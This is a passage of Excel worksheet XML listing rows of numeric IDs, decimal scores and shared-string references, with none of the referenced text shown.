        <v>0.76980000734329224</v>
      </c>
      <c r="F4217" t="s">
        <v>5592</v>
      </c>
      <c r="G4217" t="s">
        <v>8337</v>
      </c>
      <c r="H4217" t="s">
        <v>8338</v>
      </c>
    </row>
    <row r="4218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4218" s="1">
        <v>4216</v>
      </c>
      <c r="B4218">
        <v>7883</v>
      </c>
      <c r="C4218">
        <v>7883</v>
      </c>
      <c r="D4218">
        <v>2</v>
      </c>
      <c r="E4218">
        <v>0.98530000448226929</v>
      </c>
      <c r="F4218" t="s">
        <v>5592</v>
      </c>
      <c r="G4218" t="s">
        <v>8339</v>
      </c>
      <c r="H4218" t="s">
        <v>8340</v>
      </c>
    </row>
    <row r="4219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4219" s="1">
        <v>4217</v>
      </c>
      <c r="B4219">
        <v>70</v>
      </c>
      <c r="C4219">
        <v>70</v>
      </c>
      <c r="D4219">
        <v>2</v>
      </c>
      <c r="E4219">
        <v>0.75220000743865967</v>
      </c>
      <c r="F4219" t="s">
        <v>5592</v>
      </c>
      <c r="G4219" t="s">
        <v>8341</v>
      </c>
      <c r="H4219" t="s">
        <v>8342</v>
      </c>
    </row>
    <row r="4220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4220" s="1">
        <v>4218</v>
      </c>
      <c r="B4220">
        <v>71</v>
      </c>
      <c r="C4220">
        <v>71</v>
      </c>
      <c r="D4220">
        <v>2</v>
      </c>
      <c r="E4220">
        <v>0.99290001392364502</v>
      </c>
      <c r="F4220" t="s">
        <v>5592</v>
      </c>
      <c r="G4220" t="s">
        <v>8343</v>
      </c>
      <c r="H4220" t="s">
        <v>8344</v>
      </c>
    </row>
    <row r="4221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4221" s="1">
        <v>4219</v>
      </c>
      <c r="B4221">
        <v>76</v>
      </c>
      <c r="C4221">
        <v>76</v>
      </c>
      <c r="D4221">
        <v>2</v>
      </c>
      <c r="E4221">
        <v>0.68900001049041748</v>
      </c>
      <c r="F4221" t="s">
        <v>5592</v>
      </c>
      <c r="G4221" t="s">
        <v>8345</v>
      </c>
      <c r="H4221" t="s">
        <v>8346</v>
      </c>
    </row>
    <row r="4222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4222" s="1">
        <v>4220</v>
      </c>
      <c r="B4222">
        <v>77</v>
      </c>
      <c r="C4222">
        <v>77</v>
      </c>
      <c r="D4222">
        <v>2</v>
      </c>
      <c r="E4222">
        <v>0.71069997549057007</v>
      </c>
      <c r="F4222" t="s">
        <v>5592</v>
      </c>
      <c r="G4222" t="s">
        <v>8347</v>
      </c>
      <c r="H4222" t="s">
        <v>8348</v>
      </c>
    </row>
    <row r="4223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4223" s="1">
        <v>4221</v>
      </c>
      <c r="B4223">
        <v>78</v>
      </c>
      <c r="C4223">
        <v>78</v>
      </c>
      <c r="D4223">
        <v>2</v>
      </c>
      <c r="E4223">
        <v>0.53189998865127563</v>
      </c>
      <c r="F4223" t="s">
        <v>5592</v>
      </c>
      <c r="G4223" t="s">
        <v>8349</v>
      </c>
      <c r="H4223" t="s">
        <v>8350</v>
      </c>
    </row>
    <row r="4224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4224" s="1">
        <v>4222</v>
      </c>
      <c r="B4224">
        <v>79</v>
      </c>
      <c r="C4224">
        <v>79</v>
      </c>
      <c r="D4224">
        <v>2</v>
      </c>
      <c r="E4224">
        <v>0.98250001668930054</v>
      </c>
      <c r="F4224" t="s">
        <v>5592</v>
      </c>
      <c r="G4224" t="s">
        <v>8351</v>
      </c>
      <c r="H4224" t="s">
        <v>8352</v>
      </c>
    </row>
    <row r="4225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4225" s="1">
        <v>4223</v>
      </c>
      <c r="B4225">
        <v>7894</v>
      </c>
      <c r="C4225">
        <v>7894</v>
      </c>
      <c r="D4225">
        <v>2</v>
      </c>
      <c r="E4225">
        <v>0.96139997243881226</v>
      </c>
      <c r="F4225" t="s">
        <v>5592</v>
      </c>
      <c r="G4225" t="s">
        <v>8353</v>
      </c>
      <c r="H4225" t="s">
        <v>8354</v>
      </c>
    </row>
    <row r="4226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4226" s="1">
        <v>4224</v>
      </c>
      <c r="B4226">
        <v>7867</v>
      </c>
      <c r="C4226">
        <v>7867</v>
      </c>
      <c r="D4226">
        <v>2</v>
      </c>
      <c r="E4226">
        <v>0.99809998273849487</v>
      </c>
      <c r="F4226" t="s">
        <v>5592</v>
      </c>
      <c r="G4226" t="s">
        <v>8355</v>
      </c>
      <c r="H4226" t="s">
        <v>8356</v>
      </c>
    </row>
    <row r="4227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4227" s="1">
        <v>4225</v>
      </c>
      <c r="B4227">
        <v>7866</v>
      </c>
      <c r="C4227">
        <v>7866</v>
      </c>
      <c r="D4227">
        <v>2</v>
      </c>
      <c r="E4227">
        <v>0.66350001096725464</v>
      </c>
      <c r="F4227" t="s">
        <v>5592</v>
      </c>
      <c r="G4227" t="s">
        <v>8357</v>
      </c>
      <c r="H4227" t="s">
        <v>8358</v>
      </c>
    </row>
    <row r="4228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4228" s="1">
        <v>4226</v>
      </c>
      <c r="B4228">
        <v>7864</v>
      </c>
      <c r="C4228">
        <v>7864</v>
      </c>
      <c r="D4228">
        <v>2</v>
      </c>
      <c r="E4228">
        <v>0.74070000648498535</v>
      </c>
      <c r="F4228" t="s">
        <v>5592</v>
      </c>
      <c r="G4228" t="s">
        <v>8359</v>
      </c>
      <c r="H4228" t="s">
        <v>8360</v>
      </c>
    </row>
    <row r="4229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4229" s="1">
        <v>4227</v>
      </c>
      <c r="B4229">
        <v>202</v>
      </c>
      <c r="C4229">
        <v>202</v>
      </c>
      <c r="D4229">
        <v>2</v>
      </c>
      <c r="E4229">
        <v>0.46230000257492071</v>
      </c>
      <c r="F4229" t="s">
        <v>5592</v>
      </c>
      <c r="G4229" t="s">
        <v>8361</v>
      </c>
      <c r="H4229" t="s">
        <v>8362</v>
      </c>
    </row>
    <row r="4230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4230" s="1">
        <v>4228</v>
      </c>
      <c r="B4230">
        <v>7838</v>
      </c>
      <c r="C4230">
        <v>7838</v>
      </c>
      <c r="D4230">
        <v>2</v>
      </c>
      <c r="E4230">
        <v>0.97970002889633179</v>
      </c>
      <c r="F4230" t="s">
        <v>5592</v>
      </c>
      <c r="G4230" t="s">
        <v>8363</v>
      </c>
      <c r="H4230" t="s">
        <v>8364</v>
      </c>
    </row>
    <row r="4231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4231" s="1">
        <v>4229</v>
      </c>
      <c r="B4231">
        <v>7837</v>
      </c>
      <c r="C4231">
        <v>7837</v>
      </c>
      <c r="D4231">
        <v>2</v>
      </c>
      <c r="E4231">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4231" t="s">
        <v>5592</v>
      </c>
      <c r="G4231" t="s">
        <v>8365</v>
      </c>
      <c r="H4231" t="s">
        <v>8366</v>
      </c>
    </row>
    <row r="4232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4232" s="1">
        <v>4230</v>
      </c>
      <c r="B4232">
        <v>214</v>
      </c>
      <c r="C4232">
        <v>214</v>
      </c>
      <c r="D4232">
        <v>2</v>
      </c>
      <c r="E4232">
        <v>0.60600000619888306</v>
      </c>
      <c r="F4232" t="s">
        <v>5592</v>
      </c>
      <c r="G4232" t="s">
        <v>8367</v>
      </c>
      <c r="H4232" t="s">
        <v>8368</v>
      </c>
    </row>
    <row r="4233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4233" s="1">
        <v>4231</v>
      </c>
      <c r="B4233">
        <v>215</v>
      </c>
      <c r="C4233">
        <v>215</v>
      </c>
      <c r="D4233">
        <v>2</v>
      </c>
      <c r="E4233">
        <v>0.74879997968673706</v>
      </c>
      <c r="F4233" t="s">
        <v>5592</v>
      </c>
      <c r="G4233" t="s">
        <v>8369</v>
      </c>
      <c r="H4233" t="s">
        <v>8370</v>
      </c>
    </row>
    <row r="4234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4234" s="1">
        <v>4232</v>
      </c>
      <c r="B4234">
        <v>216</v>
      </c>
      <c r="C4234">
        <v>216</v>
      </c>
      <c r="D4234">
        <v>2</v>
      </c>
      <c r="E4234">
        <v>0.66820001602172852</v>
      </c>
      <c r="F4234" t="s">
        <v>5592</v>
      </c>
      <c r="G4234" t="s">
        <v>8371</v>
      </c>
      <c r="H4234" t="s">
        <v>8372</v>
      </c>
    </row>
    <row r="4235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4235" s="1">
        <v>4233</v>
      </c>
      <c r="B4235">
        <v>217</v>
      </c>
      <c r="C4235">
        <v>217</v>
      </c>
      <c r="D4235">
        <v>2</v>
      </c>
      <c r="E4235">
        <v>0.66180002689361572</v>
      </c>
      <c r="F4235" t="s">
        <v>5592</v>
      </c>
      <c r="G4235" t="s">
        <v>8373</v>
      </c>
      <c r="H4235" t="s">
        <v>8374</v>
      </c>
    </row>
    <row r="4236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4236" s="1">
        <v>4234</v>
      </c>
      <c r="B4236">
        <v>7831</v>
      </c>
      <c r="C4236">
        <v>7831</v>
      </c>
      <c r="D4236">
        <v>2</v>
      </c>
      <c r="E4236">
        <v>0.96189999580383301</v>
      </c>
      <c r="F4236" t="s">
        <v>5592</v>
      </c>
      <c r="G4236" t="s">
        <v>8375</v>
      </c>
      <c r="H4236" t="s">
        <v>8376</v>
      </c>
    </row>
    <row r="4237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4237" s="1">
        <v>4235</v>
      </c>
      <c r="B4237">
        <v>7828</v>
      </c>
      <c r="C4237">
        <v>7828</v>
      </c>
      <c r="D4237">
        <v>2</v>
      </c>
      <c r="E4237">
        <v>0.80750000476837158</v>
      </c>
      <c r="F4237" t="s">
        <v>5592</v>
      </c>
      <c r="G4237" t="s">
        <v>8377</v>
      </c>
      <c r="H4237" t="s">
        <v>8378</v>
      </c>
    </row>
    <row r="4238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4238" s="1">
        <v>4236</v>
      </c>
      <c r="B4238">
        <v>7827</v>
      </c>
      <c r="C4238">
        <v>7827</v>
      </c>
      <c r="D4238">
        <v>2</v>
      </c>
      <c r="E4238">
        <v>0.9878000020980835</v>
      </c>
      <c r="F4238" t="s">
        <v>5592</v>
      </c>
      <c r="G4238" t="s">
        <v>8379</v>
      </c>
      <c r="H4238" t="s">
        <v>8380</v>
      </c>
    </row>
    <row r="4239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4239" s="1">
        <v>4237</v>
      </c>
      <c r="B4239">
        <v>201</v>
      </c>
      <c r="C4239">
        <v>201</v>
      </c>
      <c r="D4239">
        <v>2</v>
      </c>
      <c r="E4239">
        <v>0.51450002193450928</v>
      </c>
      <c r="F4239" t="s">
        <v>5592</v>
      </c>
      <c r="G4239" t="s">
        <v>8381</v>
      </c>
      <c r="H4239" t="s">
        <v>8382</v>
      </c>
    </row>
    <row r="4240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4240" s="1">
        <v>4238</v>
      </c>
      <c r="B4240">
        <v>7826</v>
      </c>
      <c r="C4240">
        <v>7826</v>
      </c>
      <c r="D4240">
        <v>2</v>
      </c>
      <c r="E4240">
        <v>0.86150002479553223</v>
      </c>
      <c r="F4240" t="s">
        <v>5592</v>
      </c>
      <c r="G4240" t="s">
        <v>8383</v>
      </c>
      <c r="H4240" t="s">
        <v>8384</v>
      </c>
    </row>
    <row r="4241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4241" s="1">
        <v>4239</v>
      </c>
      <c r="B4241">
        <v>237</v>
      </c>
      <c r="C4241">
        <v>237</v>
      </c>
      <c r="D4241">
        <v>2</v>
      </c>
      <c r="E4241">
        <v>0.99260002374649048</v>
      </c>
      <c r="F4241" t="s">
        <v>5592</v>
      </c>
      <c r="G4241" t="s">
        <v>8385</v>
      </c>
      <c r="H4241" t="s">
        <v>8386</v>
      </c>
    </row>
    <row r="4242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4242" s="1">
        <v>4240</v>
      </c>
      <c r="B4242">
        <v>238</v>
      </c>
      <c r="C4242">
        <v>238</v>
      </c>
      <c r="D4242">
        <v>2</v>
      </c>
      <c r="E4242">
        <v>0.57270002365112305</v>
      </c>
      <c r="F4242" t="s">
        <v>5592</v>
      </c>
      <c r="G4242" t="s">
        <v>8387</v>
      </c>
      <c r="H4242" t="s">
        <v>8388</v>
      </c>
    </row>
    <row r="4243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4243" s="1">
        <v>4241</v>
      </c>
      <c r="B4243">
        <v>7825</v>
      </c>
      <c r="C4243">
        <v>7825</v>
      </c>
      <c r="D4243">
        <v>2</v>
      </c>
      <c r="E4243">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4243" t="s">
        <v>5592</v>
      </c>
      <c r="G4243" t="s">
        <v>8389</v>
      </c>
      <c r="H4243" t="s">
        <v>8390</v>
      </c>
    </row>
    <row r="4244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4244" s="1">
        <v>4242</v>
      </c>
      <c r="B4244">
        <v>241</v>
      </c>
      <c r="C4244">
        <v>241</v>
      </c>
      <c r="D4244">
        <v>2</v>
      </c>
      <c r="E4244">
        <v>0.62339997291564941</v>
      </c>
      <c r="F4244" t="s">
        <v>5592</v>
      </c>
      <c r="G4244" t="s">
        <v>8391</v>
      </c>
      <c r="H4244" t="s">
        <v>8392</v>
      </c>
    </row>
    <row r="4245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4245" s="1">
        <v>4243</v>
      </c>
      <c r="B4245">
        <v>242</v>
      </c>
      <c r="C4245">
        <v>242</v>
      </c>
      <c r="D4245">
        <v>2</v>
      </c>
      <c r="E4245">
        <v>0.69660001993179321</v>
      </c>
      <c r="F4245" t="s">
        <v>5592</v>
      </c>
      <c r="G4245" t="s">
        <v>8393</v>
      </c>
      <c r="H4245" t="s">
        <v>8394</v>
      </c>
    </row>
    <row r="4246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4246" s="1">
        <v>4244</v>
      </c>
      <c r="B4246">
        <v>243</v>
      </c>
      <c r="C4246">
        <v>243</v>
      </c>
      <c r="D4246">
        <v>2</v>
      </c>
      <c r="E4246">
        <v>0.99309998750686646</v>
      </c>
      <c r="F4246" t="s">
        <v>5592</v>
      </c>
      <c r="G4246" t="s">
        <v>8395</v>
      </c>
      <c r="H4246" t="s">
        <v>8396</v>
      </c>
    </row>
    <row r="4247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4247" s="1">
        <v>4245</v>
      </c>
      <c r="B4247">
        <v>7824</v>
      </c>
      <c r="C4247">
        <v>7824</v>
      </c>
      <c r="D4247">
        <v>2</v>
      </c>
      <c r="E4247">
        <v>0.99220001697540283</v>
      </c>
      <c r="F4247" t="s">
        <v>5592</v>
      </c>
      <c r="G4247" t="s">
        <v>8397</v>
      </c>
      <c r="H4247" t="s">
        <v>8398</v>
      </c>
    </row>
    <row r="4248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4248" s="1">
        <v>4246</v>
      </c>
      <c r="B4248">
        <v>7820</v>
      </c>
      <c r="C4248">
        <v>7820</v>
      </c>
      <c r="D4248">
        <v>2</v>
      </c>
      <c r="E4248">
        <v>0.87370002269744873</v>
      </c>
      <c r="F4248" t="s">
        <v>5592</v>
      </c>
      <c r="G4248" t="s">
        <v>8399</v>
      </c>
      <c r="H4248" t="s">
        <v>6023</v>
      </c>
    </row>
    <row r="4249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4249" s="1">
        <v>4247</v>
      </c>
      <c r="B4249">
        <v>254</v>
      </c>
      <c r="C4249">
        <v>254</v>
      </c>
      <c r="D4249">
        <v>2</v>
      </c>
      <c r="E4249">
        <v>0.49869999289512629</v>
      </c>
      <c r="F4249" t="s">
        <v>5592</v>
      </c>
      <c r="G4249" t="s">
        <v>8400</v>
      </c>
      <c r="H4249" t="s">
        <v>8401</v>
      </c>
    </row>
    <row r="4250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4250" s="1">
        <v>4248</v>
      </c>
      <c r="B4250">
        <v>7816</v>
      </c>
      <c r="C4250">
        <v>7816</v>
      </c>
      <c r="D4250">
        <v>2</v>
      </c>
      <c r="E4250">
        <v>0.69349998235702515</v>
      </c>
      <c r="F4250" t="s">
        <v>5592</v>
      </c>
      <c r="G4250" t="s">
        <v>8402</v>
      </c>
      <c r="H4250" t="s">
        <v>8403</v>
      </c>
    </row>
    <row r="4251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4251" s="1">
        <v>4249</v>
      </c>
      <c r="B4251">
        <v>236</v>
      </c>
      <c r="C4251">
        <v>236</v>
      </c>
      <c r="D4251">
        <v>2</v>
      </c>
      <c r="E4251">
        <v>0.57400000095367432</v>
      </c>
      <c r="F4251" t="s">
        <v>5592</v>
      </c>
      <c r="G4251" t="s">
        <v>8404</v>
      </c>
      <c r="H4251" t="s">
        <v>8405</v>
      </c>
    </row>
    <row r="4252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4252" s="1">
        <v>4250</v>
      </c>
      <c r="B4252">
        <v>7810</v>
      </c>
      <c r="C4252">
        <v>7810</v>
      </c>
      <c r="D4252">
        <v>2</v>
      </c>
      <c r="E4252">
        <v>0.77160000801086426</v>
      </c>
      <c r="F4252" t="s">
        <v>5592</v>
      </c>
      <c r="G4252" t="s">
        <v>8406</v>
      </c>
      <c r="H4252" t="s">
        <v>8407</v>
      </c>
    </row>
    <row r="4253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4253" s="1">
        <v>4251</v>
      </c>
      <c r="B4253">
        <v>200</v>
      </c>
      <c r="C4253">
        <v>200</v>
      </c>
      <c r="D4253">
        <v>2</v>
      </c>
      <c r="E4253">
        <v>0.99190002679824829</v>
      </c>
      <c r="F4253" t="s">
        <v>5592</v>
      </c>
      <c r="G4253" t="s">
        <v>8408</v>
      </c>
      <c r="H4253" t="s">
        <v>8409</v>
      </c>
    </row>
    <row r="4254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4254" s="1">
        <v>4252</v>
      </c>
      <c r="B4254">
        <v>198</v>
      </c>
      <c r="C4254">
        <v>198</v>
      </c>
      <c r="D4254">
        <v>2</v>
      </c>
      <c r="E4254">
        <v>0.8978000283241272</v>
      </c>
      <c r="F4254" t="s">
        <v>5592</v>
      </c>
      <c r="G4254" t="s">
        <v>8410</v>
      </c>
      <c r="H4254" t="s">
        <v>8411</v>
      </c>
    </row>
    <row r="4255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4255" s="1">
        <v>4253</v>
      </c>
      <c r="B4255">
        <v>7863</v>
      </c>
      <c r="C4255">
        <v>7863</v>
      </c>
      <c r="D4255">
        <v>2</v>
      </c>
      <c r="E4255">
        <v>0.74709999561309814</v>
      </c>
      <c r="F4255" t="s">
        <v>5592</v>
      </c>
      <c r="G4255" t="s">
        <v>8412</v>
      </c>
      <c r="H4255" t="s">
        <v>8413</v>
      </c>
    </row>
    <row r="4256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4256" s="1">
        <v>4254</v>
      </c>
      <c r="B4256">
        <v>149</v>
      </c>
      <c r="C4256">
        <v>149</v>
      </c>
      <c r="D4256">
        <v>2</v>
      </c>
      <c r="E4256">
        <v>0.62199997901916504</v>
      </c>
      <c r="F4256" t="s">
        <v>5592</v>
      </c>
      <c r="G4256" t="s">
        <v>8414</v>
      </c>
      <c r="H4256" t="s">
        <v>8415</v>
      </c>
    </row>
    <row r="4257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4257" s="1">
        <v>4255</v>
      </c>
      <c r="B4257">
        <v>151</v>
      </c>
      <c r="C4257">
        <v>151</v>
      </c>
      <c r="D4257">
        <v>2</v>
      </c>
      <c r="E4257">
        <v>0.88859999179840088</v>
      </c>
      <c r="F4257" t="s">
        <v>5592</v>
      </c>
      <c r="G4257" t="s">
        <v>8416</v>
      </c>
      <c r="H4257" t="s">
        <v>8417</v>
      </c>
    </row>
    <row r="4258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4258" s="1">
        <v>4256</v>
      </c>
      <c r="B4258">
        <v>7858</v>
      </c>
      <c r="C4258">
        <v>7858</v>
      </c>
      <c r="D4258">
        <v>2</v>
      </c>
      <c r="E4258">
        <v>0.99150002002716064</v>
      </c>
      <c r="F4258" t="s">
        <v>5592</v>
      </c>
      <c r="G4258" t="s">
        <v>8418</v>
      </c>
      <c r="H4258" t="s">
        <v>8419</v>
      </c>
    </row>
    <row r="4259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4259" s="1">
        <v>4257</v>
      </c>
      <c r="B4259">
        <v>157</v>
      </c>
      <c r="C4259">
        <v>157</v>
      </c>
      <c r="D4259">
        <v>2</v>
      </c>
      <c r="E4259">
        <v>0.42789998650550842</v>
      </c>
      <c r="F4259" t="s">
        <v>5592</v>
      </c>
      <c r="G4259" t="s">
        <v>8420</v>
      </c>
      <c r="H4259" t="s">
        <v>8421</v>
      </c>
    </row>
    <row r="4260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4260" s="1">
        <v>4258</v>
      </c>
      <c r="B4260">
        <v>160</v>
      </c>
      <c r="C4260">
        <v>160</v>
      </c>
      <c r="D4260">
        <v>2</v>
      </c>
      <c r="E4260">
        <v>0.53609997034072876</v>
      </c>
      <c r="F4260" t="s">
        <v>5592</v>
      </c>
      <c r="G4260" t="s">
        <v>8422</v>
      </c>
      <c r="H4260" t="s">
        <v>8423</v>
      </c>
    </row>
    <row r="4261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4261" s="1">
        <v>4259</v>
      </c>
      <c r="B4261">
        <v>7856</v>
      </c>
      <c r="C4261">
        <v>7856</v>
      </c>
      <c r="D4261">
        <v>2</v>
      </c>
      <c r="E4261">
        <v>0.99879997968673706</v>
      </c>
      <c r="F4261" t="s">
        <v>5592</v>
      </c>
      <c r="G4261" t="s">
        <v>8424</v>
      </c>
      <c r="H4261" t="s">
        <v>8425</v>
      </c>
    </row>
    <row r="4262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4262" s="1">
        <v>4260</v>
      </c>
      <c r="B4262">
        <v>163</v>
      </c>
      <c r="C4262">
        <v>163</v>
      </c>
      <c r="D4262">
        <v>2</v>
      </c>
      <c r="E4262">
        <v>0.57520002126693726</v>
      </c>
      <c r="F4262" t="s">
        <v>5592</v>
      </c>
      <c r="G4262" t="s">
        <v>8426</v>
      </c>
      <c r="H4262" t="s">
        <v>8427</v>
      </c>
    </row>
    <row r="4263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4263" s="1">
        <v>4261</v>
      </c>
      <c r="B4263">
        <v>172</v>
      </c>
      <c r="C4263">
        <v>172</v>
      </c>
      <c r="D4263">
        <v>2</v>
      </c>
      <c r="E4263">
        <v>0.57760000228881836</v>
      </c>
      <c r="F4263" t="s">
        <v>5592</v>
      </c>
      <c r="G4263" t="s">
        <v>8428</v>
      </c>
      <c r="H4263" t="s">
        <v>8429</v>
      </c>
    </row>
    <row r="4264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4264" s="1">
        <v>4262</v>
      </c>
      <c r="B4264">
        <v>175</v>
      </c>
      <c r="C4264">
        <v>175</v>
      </c>
      <c r="D4264">
        <v>2</v>
      </c>
      <c r="E4264">
        <v>0.6315000057220459</v>
      </c>
      <c r="F4264" t="s">
        <v>5592</v>
      </c>
      <c r="G4264" t="s">
        <v>8430</v>
      </c>
      <c r="H4264" t="s">
        <v>8431</v>
      </c>
    </row>
    <row r="4265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4265" s="1">
        <v>4263</v>
      </c>
      <c r="B4265">
        <v>199</v>
      </c>
      <c r="C4265">
        <v>199</v>
      </c>
      <c r="D4265">
        <v>2</v>
      </c>
      <c r="E4265">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4265" t="s">
        <v>5592</v>
      </c>
      <c r="G4265" t="s">
        <v>8432</v>
      </c>
      <c r="H4265" t="s">
        <v>8433</v>
      </c>
    </row>
    <row r="4266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4266" s="1">
        <v>4264</v>
      </c>
      <c r="B4266">
        <v>177</v>
      </c>
      <c r="C4266">
        <v>177</v>
      </c>
      <c r="D4266">
        <v>2</v>
      </c>
      <c r="E4266">
        <v>0.87230002880096436</v>
      </c>
      <c r="F4266" t="s">
        <v>5592</v>
      </c>
      <c r="G4266" t="s">
        <v>8434</v>
      </c>
      <c r="H4266" t="s">
        <v>8435</v>
      </c>
    </row>
    <row r="4267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4267" s="1">
        <v>4265</v>
      </c>
      <c r="B4267">
        <v>7845</v>
      </c>
      <c r="C4267">
        <v>7845</v>
      </c>
      <c r="D4267">
        <v>2</v>
      </c>
      <c r="E4267">
        <v>0.92339998483657837</v>
      </c>
      <c r="F4267" t="s">
        <v>5592</v>
      </c>
      <c r="G4267" t="s">
        <v>8436</v>
      </c>
      <c r="H4267" t="s">
        <v>8437</v>
      </c>
    </row>
    <row r="4268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4268" s="1">
        <v>4266</v>
      </c>
      <c r="B4268">
        <v>183</v>
      </c>
      <c r="C4268">
        <v>183</v>
      </c>
      <c r="D4268">
        <v>2</v>
      </c>
      <c r="E4268">
        <v>0.9692000150680542</v>
      </c>
      <c r="F4268" t="s">
        <v>5592</v>
      </c>
      <c r="G4268" t="s">
        <v>8438</v>
      </c>
      <c r="H4268" t="s">
        <v>8439</v>
      </c>
    </row>
    <row r="4269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4269" s="1">
        <v>4267</v>
      </c>
      <c r="B4269">
        <v>185</v>
      </c>
      <c r="C4269">
        <v>185</v>
      </c>
      <c r="D4269">
        <v>2</v>
      </c>
      <c r="E4269">
        <v>0.98919999599456787</v>
      </c>
      <c r="F4269" t="s">
        <v>5592</v>
      </c>
      <c r="G4269" t="s">
        <v>8440</v>
      </c>
      <c r="H4269" t="s">
        <v>8441</v>
      </c>
    </row>
    <row r="4270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4270" s="1">
        <v>4268</v>
      </c>
      <c r="B4270">
        <v>186</v>
      </c>
      <c r="C4270">
        <v>186</v>
      </c>
      <c r="D4270">
        <v>2</v>
      </c>
      <c r="E4270">
        <v>0.88870000839233398</v>
      </c>
      <c r="F4270" t="s">
        <v>5592</v>
      </c>
      <c r="G4270" t="s">
        <v>8442</v>
      </c>
      <c r="H4270" t="s">
        <v>8443</v>
      </c>
    </row>
    <row r="4271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4271" s="1">
        <v>4269</v>
      </c>
      <c r="B4271">
        <v>187</v>
      </c>
      <c r="C4271">
        <v>187</v>
      </c>
      <c r="D4271">
        <v>2</v>
      </c>
      <c r="E4271">
        <v>0.93599998950958252</v>
      </c>
      <c r="F4271" t="s">
        <v>5592</v>
      </c>
      <c r="G4271" t="s">
        <v>8444</v>
      </c>
      <c r="H4271" t="s">
        <v>8445</v>
      </c>
    </row>
    <row r="4272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4272" s="1">
        <v>4270</v>
      </c>
      <c r="B4272">
        <v>7844</v>
      </c>
      <c r="C4272">
        <v>7844</v>
      </c>
      <c r="D4272">
        <v>2</v>
      </c>
      <c r="E4272">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4272" t="s">
        <v>5592</v>
      </c>
      <c r="G4272" t="s">
        <v>8446</v>
      </c>
      <c r="H4272" t="s">
        <v>6994</v>
      </c>
    </row>
    <row r="4273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4273" s="1">
        <v>4271</v>
      </c>
      <c r="B4273">
        <v>192</v>
      </c>
      <c r="C4273">
        <v>192</v>
      </c>
      <c r="D4273">
        <v>2</v>
      </c>
      <c r="E4273">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4273" t="s">
        <v>5592</v>
      </c>
      <c r="G4273" t="s">
        <v>8447</v>
      </c>
      <c r="H4273" t="s">
        <v>8448</v>
      </c>
    </row>
    <row r="4274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4274" s="1">
        <v>4272</v>
      </c>
      <c r="B4274">
        <v>194</v>
      </c>
      <c r="C4274">
        <v>194</v>
      </c>
      <c r="D4274">
        <v>2</v>
      </c>
      <c r="E4274">
        <v>0.74980002641677856</v>
      </c>
      <c r="F4274" t="s">
        <v>5592</v>
      </c>
      <c r="G4274" t="s">
        <v>8449</v>
      </c>
      <c r="H4274" t="s">
        <v>8450</v>
      </c>
    </row>
    <row r="4275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4275" s="1">
        <v>4273</v>
      </c>
      <c r="B4275">
        <v>7842</v>
      </c>
      <c r="C4275">
        <v>7842</v>
      </c>
      <c r="D4275">
        <v>2</v>
      </c>
      <c r="E4275">
        <v>0.82639998197555542</v>
      </c>
      <c r="F4275" t="s">
        <v>5592</v>
      </c>
      <c r="G4275" t="s">
        <v>8451</v>
      </c>
      <c r="H4275" t="s">
        <v>8452</v>
      </c>
    </row>
    <row r="4276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4276" s="1">
